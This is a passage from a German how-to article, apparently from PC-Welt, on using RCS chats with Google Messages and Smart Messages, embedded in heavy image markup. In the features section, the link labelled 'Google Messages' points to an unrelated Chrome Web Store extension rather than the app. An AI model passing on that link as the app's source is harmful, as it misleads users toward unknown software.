zu nutzen, müssen Sie ihn zuerst in den Einstellungen aktivieren." class="wp-image-2600018" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_1.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_1.jpg?resize=234%2C300&amp;quality=50&amp;strip=all 234w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_1.jpg?resize=768%2C985&amp;quality=50&amp;strip=all 768w" width="800" height="1026" sizes="(max-width: 800px) 100vw, 800px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterstützen. Um den Kommunikationsstandard zu nutzen, müssen Sie ihn zuerst in den Einstellungen aktivieren." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Google Messages ist derzeit noch eine der wenigen Apps, die RCS-Chats unterstützen. Um den Kommunikationsstandard zu nutzen, müssen Sie ihn zuerst in den Einstellungen aktivieren.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Um mit einem Chatpartner per RCS zu kommunizieren, verwenden Sie normalerweise die App, mit der Sie auch SMS und MMS verschicken, also beispielsweise <strong>Google Messages</strong> oder <strong>Apple iMessage</strong>. </p>



<p>Dabei ist zu beachten, dass beide Chatpartner eine RCS-fähige App nutzen müssen, sonst verläuft die Unterhaltung wie bisher per SMS. Sind die Voraussetzungen jedoch gegeben, bietet der RCS-Chat im Vergleich zu einer SMS-Unterhaltung viele Vorteile und kann durchaus mit einem Chat per Whatsapp &amp; Co. mithalten. </p>



<p>Wer beispielsweise viel Wert auf Sicherheit legt, der sollte wissen, dass RCS das Adressbuch des Anwenders nicht mit dem Provider zwecks Datenabgleich teilt, und die Chats sind Ende-zu-Ende-verschlüsselt. </p>



<p>Außerdem kann es sein, dass Google beziehungsweise <a href="https://docs.jibemobile.com/?hl=de" target="_blank" rel="noreferrer noopener">Jibe Mobile</a> Ihnen von Zeit zu Zeit eine SMS schickt, über die Sie zur Sicherheit Ihre Telefonnummer bestätigen müssen.</p>



<p>Aber auch hinsichtlich der Bedienung bieten RCS-Chats viele nützliche Funktionen, die Sie von Ihrem Lieblings-Messenger kennen, die aber per SMS nicht möglich sind: </p>



<p>So sehen Sie beispielsweise, wenn Ihr Gegenüber schreibt, Sie können Lesebestätigungen einrichten, Gruppenchats führen und Thread-Antworten abgeben. Außerdem können Sie Sprachnachrichten, hochaufgelöste Fotos sowie Videos verschicken. </p>



<p>Allerdings hängt die Verfügbarkeit mancher Funktionen – etwa der Versand von Multimediadateien – vom Provider ab. Beispielsweise lässt Vodafone den Versand von Fotos und Videos per RCS (wie auch per MMS) nicht zu. </p>



<p>Überprüfen Sie hier also, welche Konditionen für RCS-Chats Ihr Vertrag enthält. In Deutschland unterstützen prinzipiell die Telekom, Vodafone und O2 RCS-Chats.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2600026","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: \u00dcber das Pluszeichen f\u00fcgen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Au\u00dferdem d\u00fcrfen Sie bestimmen, wann Sie den Post abschicken.","alt":"\u00dcber das Pluszeichen f\u00fcgen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Au\u00dferdem d\u00fcrfen Sie bestimmen, wann Sie den Post abschicken."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?quality=50&amp;strip=all&amp;w=775" alt="Über das Pluszeichen fügen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Außerdem dürfen Sie bestimmen, wann Sie den Post abschicken." class="wp-image-2600026" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?resize=194%2C300&amp;quality=50&amp;strip=all 194w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?resize=768%2C1188&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_2.jpg?resize=775%2C1200&amp;quality=50&amp;strip=all 775w" width="775" height="1199" sizes="(max-width: 775px) 100vw, 775px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Über das Pluszeichen fügen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Außerdem dürfen Sie bestimmen, wann Sie den Post abschicken." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Über das Pluszeichen fügen Sie Ihrer RCS-Nachricht Fotos, (Selfie-)GIFs, Sticker, Dateien, Standortinfos oder einen Kontakt hinzu. Außerdem dürfen Sie bestimmen, wann Sie den Post abschicken.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Aber auch die verwendete App muss die theoretisch möglichen Funktionen unterstützen, was derzeit leider noch nicht bei vielen SMS-Apps der Fall ist. </p>



<p>Gegebenenfalls müssen Sie die RCS-Chats in der App auch erst manuell aktivieren. In Google Messages tippen Sie dazu auf Ihr Profilbild und auf „Messages-Einstellungen“. Tippen Sie dann auf den ersten Eintrag „RCS-Chats“ (alternativ „Chatfunktionen“), und legen Sie den Schieberegler bei „RSC-Chats aktivieren“ um. </p>



<p>Hat Ihr Chatpartner RCS ebenfalls aktiviert, laufen Ihre Gespräche künftig allesamt über RCS.</p>



<p><strong>Wichtig:</strong> Haben Sie Verbindungsprobleme bei Ihren RCS-Chats, überprüfen Sie, ob Sie die neuesten App-Versionen von Google Messages und den Google Carrier Services installiert haben. Ist Ihr Smartphone mit zwei SIM-Steckplätzen ausgestattet, ist zu beachten, dass RCS-Chats derzeit nur für die Standard-SIM beziehungsweise die für Anrufe bevorzugte SIM verfügbar sind.</p>



<p><strong>Tipp: </strong><a href="https://www.pcwelt.de/article/2318115/beste-ki-smartphones.html" target="_blank" rel="noreferrer noopener">Diese Smartphones haben bereits künstliche Intelligenz an Bord</a></p>



<h2 class="wp-block-heading toc">Nachteile von RCS-Chat</h2>



<p>Der RCS-Chat hat aber natürlich nicht nur Vorteile. So verwendet Google Informationen wie Ihre Telefonnummer, die Gerätekennung Ihres Smartphones und die SIM-Kartennummer, um sicherzustellen, dass die Nachrichten auch korrekt zugestellt werden. </p>



<p>Die Daten bleiben etwa einen Monat lang gespeichert, sodass Sie auch dann mit RCS verbunden bleiben, wenn Sie vorübergehend offline sind.</p>



<p>Auch prüft Google regelmäßig alle Ihre Kontakte darauf, ob diese RCS-Chats nutzen können. Dazu werden die Daten über Googles RCS-Infrastruktur übertragen, und es können auch andere Serviceanbieter beteiligt sein.</p>



<p>Da manche Messenger es mit dem Datenschutz jedoch auch nicht so genau nehmen, liegt es an Ihnen als Anwender, ob Sie Ihre Daten gegen Komfort eintauschen möchten.</p>



<p><strong>Gleiches gilt für eventuelle Kosten: </strong>RCS-Nachrichten werden immer per WLAN und über die mobilen Daten verschickt. Befinden Sie sich gerade nicht in einem kostenlosen WLAN, können dabei je nach Mobilfunkvertrag Kosten anfallen. In der Regel enthalten moderne Tarifverträge jedoch eine SMS-Flatrate.</p>



<h2 class="wp-block-heading toc">RCS-Chat: Funktionen im Überblick</h2>



<p>Für unseren Ratgeber haben wir uns die App <a href="https://chromewebstore.google.com/detail/top-best-extension/cpmbdnkbpaabapidllalnfopojfimbno?utm_source=s-gp-3045" target="_blank" rel="noreferrer noopener">Google Messages</a> näher angesehen. Sie bietet in den Einstellungen einige nützliche Funktionen, die Sie per Schieberegler aktivieren oder deaktivieren.</p>



<p>Beispielsweise richten Sie darin die Lesebestätigung ein, die Ihren Chatpartnern mitteilt, wenn Sie deren Nachricht gelesen haben. Sie legen darin auch fest, dass eine Nachricht zusätzlich per SMS/MMS geschickt wird, falls sie nicht per RCS zugestellt werden konnte.</p>



<p>Hier ist jedoch zu beachten, dass, falls der Provider keinen Versand von Multimediadateien per RCS erlaubt, dies in der Regel auch per MMS nicht funktioniert.</p>



<p>In den Einstellungen bestimmen Sie ferner, in welchem Format Anhänge zur Sicherheit gesendet werden sollen (als MMS oder als SMS mit Link), wie groß Dateien sein dürfen, die über mobile Daten heruntergeladen werden (und ob überhaupt) und ob dies auch bei Roaming erlaubt sein soll.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2600028","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Die Funktion \u201eFotomoji\u201c macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen d\u00fcrfen. Dabei arbeitet die App-KI selbstst\u00e4ndig und zeigt Ihnen potenzielle Motive an.","alt":"Die Funktion \u201eFotomoji\u201c macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen d\u00fcrfen. Dabei arbeitet die App-KI selbstst\u00e4ndig und zeigt Ihnen potenzielle Motive an."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?quality=50&amp;strip=all&amp;w=680" alt="Die Funktion „Fotomoji“ macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen dürfen. Dabei arbeitet die App-KI selbstständig und zeigt Ihnen potenzielle Motive an." class="wp-image-2600028" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?resize=170%2C300&amp;quality=50&amp;strip=all 170w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?resize=768%2C1356&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_3.jpg?resize=680%2C1200&amp;quality=50&amp;strip=all 680w" width="680" height="1200" sizes="(max-width: 680px) 100vw, 680px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Die Funktion „Fotomoji“ macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen dürfen. Dabei arbeitet die App-KI selbstständig und zeigt Ihnen potenzielle Motive an." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Die Funktion „Fotomoji“ macht aus Motiven Ihrer Bilder Emojis, die Sie ganz nach Wunsch in Ihre Nachrichten einbauen dürfen. Dabei arbeitet die App-KI selbstständig und zeigt Ihnen potenzielle Motive an.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Aber auch bei der Bedienung an sich hat RCS über Google Messages einiges zu bieten, was Sie auch bei Whatsapp &amp; Co. finden: Zum Erstellen einer Nachricht tippen Sie Ihren Text beispielsweise wie gehabt in die Eingabezeile, die zur Bestätigung „RCS-Nachricht“ enthält. </p>



<p>Zum Abschicken verwenden Sie das blaue Dreieck in der Zeile. Über den Smiley fügen Sie animierte und statische Emojis, Sticker und GIFs hinzu. Eine Besonderheit sind hier die „Fotomojis“: Über den Reiter können Sie Bilder in Sticker verwandeln. </p>



<p>Dazu tippen Sie auf die „Erstellen“-Schaltfläche und navigieren zu einem Foto. Per KI bestimmt das Programm selbstständig mögliche Motive, also Personen, Gegenstände etc., von denen Sie das gewünschte per Fingertipp auswählen und versenden. <strong>Fotomojis </strong>lassen sich auch abspeichern, sodass Sie sie später noch einmal verwenden können.</p>



<p><strong>Die integrierte KI kann aber noch mehr: </strong>Möchten Sie einen geschriebenen, aber noch nicht gesendeten Text umformulieren, tippen Sie auf die spitze Klammer links daneben, dann auf das Plussymbol und „Magische Textvorschläge“.</p>



<p>Nun bietet Ihnen die KI Alternativen zu Ihrem Text, deren Stil Sie noch mit „Cool“, „Begeistert“ oder „Formell“ beeinflussen können. Wählen Sie anschließend den gewünschten Text aus, und schicken Sie ihn ab.</p>



<p><strong>Übrigens: </strong>In einem Chat verraten Ihnen kleine Symbole, in welchem Status sich eine Nachricht gerade befindet – also wie bei Whatsapp. Eine Stoppuhr bedeutet dabei, die Nachricht wird gesendet, ein Häkchen, die Nachricht wurde verschickt, zwei Häkchen, die Nachricht ist beim Empfänger angekommen, und zwei farbige Häkchen, die Nachricht wurde vom Empfänger gelesen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-full","figureStyles":null,"imgClassNames":"wp-image-2600035","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Auch Sprachnachrichten sind in RCS-Chats m\u00f6glich. Sie starten sie \u00fcber das Frequenzsymbol, nach dem Beenden d\u00fcrfen Sie entscheiden, ob Sie die Aufnahme abschicken m\u00f6chten.","alt":"Auch Sprachnachrichten sind in RCS-Chats m\u00f6glich. Sie starten sie \u00fcber das Frequenzsymbol, nach dem Beenden d\u00fcrfen Sie entscheiden, ob Sie die Aufnahme abschicken m\u00f6chten."}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_4.jpg?quality=50&amp;strip=all" alt="Auch Sprachnachrichten sind in RCS-Chats möglich. Sie starten sie über das Frequenzsymbol, nach dem Beenden dürfen Sie entscheiden, ob Sie die Aufnahme abschicken möchten." class="wp-image-2600035" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_4.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_4.jpg?resize=210%2C300&amp;quality=50&amp;strip=all 210w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_4.jpg?resize=768%2C1098&amp;quality=50&amp;strip=all 768w" width="800" height="1144" sizes="(max-width: 800px) 100vw, 800px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Auch Sprachnachrichten sind in RCS-Chats möglich. Sie starten sie über das Frequenzsymbol, nach dem Beenden dürfen Sie entscheiden, ob Sie die Aufnahme abschicken möchten." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Auch Sprachnachrichten sind in RCS-Chats möglich. Sie starten sie über das Frequenzsymbol, nach dem Beenden dürfen Sie entscheiden, ob Sie die Aufnahme abschicken möchten.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Die bereits erwähnten Sprachnachrichten zeichnen Sie über das stilisierte Frequenzsymbol in der Eingabezeile rechts neben dem Smiley auf. Hier dürfen Sie Ihre Nachricht zusätzlich mit sogenannten Voice Moods versehen, Stimmungs-Emojis, die dann im Fenster Ihrer Nachricht eingeblendet werden. </p>



<p>Auch Reaktionen auf Nachrichten lassen sich per Emoji hinzufügen. Dazu tippen Sie länger auf eine Nachricht und wählen aus den eingeblendeten fünf Emojis das gewünschte aus, das mit einer kurzen Animation eingefügt wird. Sie dürfen auch andere Emojis und Fotomojis auswählen, dann allerdings ohne Animation.</p>



<h2 class="wp-block-heading toc">Google Messages am PC nutzen</h2>



<p>Genau wie Whatsapp &amp; Co. können Sie auch Google Messages am PC im Browser nutzen. <a href="https://messages.google.com/web/welcome" target="_blank" rel="noreferrer noopener">Rufen Sie dazu diese URL auf</a>, und melden Sie sich mit Ihrem Google-Konto an.</p>



<p>Zum Koppeln des Smartphones zeigt Ihnen die Webversion ein Symbol an, das Sie auf dem Smartphone in der geöffneten App antippen, um die Verbindung zu bestätigen. Anschließend sehen Sie alle Ihre Chats in einer Liste.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-full","figureStyles":null,"imgClassNames":"wp-image-2600041","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Wie bei Whatsapp gibt es auch f\u00fcr RCS-Chats die M\u00f6glichkeit, sie am PC zu f\u00fchren. Analog zu Whatsapp m\u00fcssen Sie daf\u00fcr auch Ihr Smartphone per QRCode mit dem PC koppeln.","alt":"Wie bei Whatsapp gibt es auch f\u00fcr RCS-Chats die M\u00f6glichkeit, sie am PC zu f\u00fchren. Analog zu Whatsapp m\u00fcssen Sie daf\u00fcr auch Ihr Smartphone per QRCode mit dem PC koppeln."}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_5.jpg?quality=50&amp;strip=all" alt="Wie bei Whatsapp gibt es auch für RCS-Chats die Möglichkeit, sie am PC zu führen. Analog zu Whatsapp müssen Sie dafür auch Ihr Smartphone per QRCode mit dem PC koppeln." class="wp-image-2600041" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_5.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_5.jpg?resize=295%2C300&amp;quality=50&amp;strip=all 295w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_5.jpg?resize=768%2C781&amp;quality=50&amp;strip=all 768w" width="800" height="814" sizes="(max-width: 800px) 100vw, 800px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Wie bei Whatsapp gibt es auch für RCS-Chats die Möglichkeit, sie am PC zu führen. Analog zu Whatsapp müssen Sie dafür auch Ihr Smartphone per QRCode mit dem PC koppeln." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Wie bei Whatsapp gibt es auch für RCS-Chats die Möglichkeit, sie am PC zu führen. Analog zu Whatsapp müssen Sie dafür auch Ihr Smartphone per QRCode mit dem PC koppeln.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Über „Chat starten“ beginnen Sie ein neues Gespräch, ansonsten stehen Ihnen wie in der Smartphone-App Emojis, Sticker, GIFs und die Möglichkeit, Anhänge zu verschicken, zur Verfügung. Einstellungen wie Lesebestätigungen, akustische Benachrichtigungen beim Nachrichteneingang oder eine Schreibanzeige können Sie über die drei horizontalen Striche und „Einstellungen“ einrichten.</p>



<h2 class="wp-block-heading toc">Smart Messages</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2600043","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages m\u00fcssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren.","alt":"Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages m\u00fcssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?quality=50&amp;strip=all&amp;w=523" alt="Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages müssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren." class="wp-image-2600043" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?resize=131%2C300&amp;quality=50&amp;strip=all 131w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?resize=768%2C1764&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?resize=523%2C1200&amp;quality=50&amp;strip=all 523w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_6.jpg?resize=669%2C1536&amp;quality=50&amp;strip=all 669w" width="523" height="1201" sizes="(max-width: 523px) 100vw, 523px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages müssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren." data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="context.imageButtonRight" data-wp-style--top="context.imageButtonTop">
			<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
				<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
			</svg>
		</button><figcaption class="wp-element-caption"><p>Smart Messages ist eine Alternative zu Google Messages, die ebenfalls RCS-Chats beherrscht. Wie bei Google Messages müssen Sie auch bei Smart Messages den RCS-Chat erst aktivieren.</p>
</figcaption></figure><p class="imageCredit">IDG</p></div>



<p>Gefällt Ihnen Google Messages als RCS-Chat-Client nicht, gibt es im Google Play Store mit <a href="https://play.google.com/store/apps/details?id=com.messages.chat" target="_blank" rel="noreferrer noopener">Smart Messages</a> eine alternative RCS-Chat-App mit vielen Funktionen. </p>



<p><strong>Wichtig: </strong>Möchten Sie die App nutzen, müssen Sie sie zuerst zu Ihrer Standard-SMS-App machen, bevor Sie RCS-Chat verwenden können. Normalerweise haben Sie dazu beim ersten Start die Gelegenheit. </p>



<p>Falls die Option jedoch nicht auftaucht, finden Sie sie in den Smartphone-Einstellungen unter „Apps –› Standard-Apps“. Tippen Sie hier auf „SMS-App“, und wählen Sie Smart Messages aus. </p>



<p><strong>Als Nächstes müssen Sie in Smart Messages RCS aktivieren: </strong>Öffnen Sie dazu in der App die Einstellungen über die drei horizontalen Striche, und legen Sie den Schalter bei „Rich Communication Features“ auf „On“. </p>



<p>Nach der automatischen Authentifizierung können Sie Lesebestätigungen und den Tippindikator aktivieren. Nehmen Sie gegebenenfalls weitere Einstellungen wie Dark Mode, Zustellberichte etc. vor. </p>



<p>In der Eingabezeile eines Chats stehen Ihnen Sprachnachrichten, Emojis, Sticker und GIFs zur Auswahl. Nachrichtenanhänge fügen Sie über die Büroklammer hinzu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"uploadedSrc":false,"figureClassNames":"wp-block-image size-large","figureStyles":null,"imgClassNames":"wp-image-2600045","imgStyles":null,"targetWidth":"none","targetHeight":"none","scaleAttr":false,"ariaLabel":"Enlarge image: M\u00f6chten Sie Google Messages oder Smart Messages f\u00fcr RCS-Chats verwenden, m\u00fcssen Sie die App in den Smartphone-Einstellungen unter \u201eApps \u2013\u203a Standard- Apps\u201c als SMS-App festlegen.","alt":"M\u00f6chten Sie Google Messages oder Smart Messages f\u00fcr RCS-Chats verwenden, m\u00fcssen Sie die App in den Smartphone-Einstellungen unter \u201eApps \u2013\u203a Standard- Apps\u201c als SMS-App festlegen."}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?quality=50&amp;strip=all&amp;w=563" alt="Möchten Sie Google Messages oder Smart Messages für RCS-Chats verwenden, müssen Sie die App in den Smartphone-Einstellungen unter „Apps –› Standard- Apps“ als SMS-App festlegen." class="wp-image-2600045" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?resize=141%2C300&amp;quality=50&amp;strip=all 141w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?resize=768%2C1638&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?resize=563%2C1200&amp;quality=50&amp;strip=all 563w, https://b2c-contenthub.com/wp-content/uploads/2025/02/rcs_7.jpg?resize=720%2C1536&amp;quality=50&amp;strip=all 720w" width="563" height="1201" sizes="(max-width: 563px) 100vw, 563px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge image: Möchten Sie Google Messages oder Smart Messages für RCS-Chats verwenden, müssen Sie die App in den Smartphone-Einstellungen unter „Apps –› Standard- Apps“ als SMS-App festlegen." data-wp-init="callbacks.initTriggerButton" 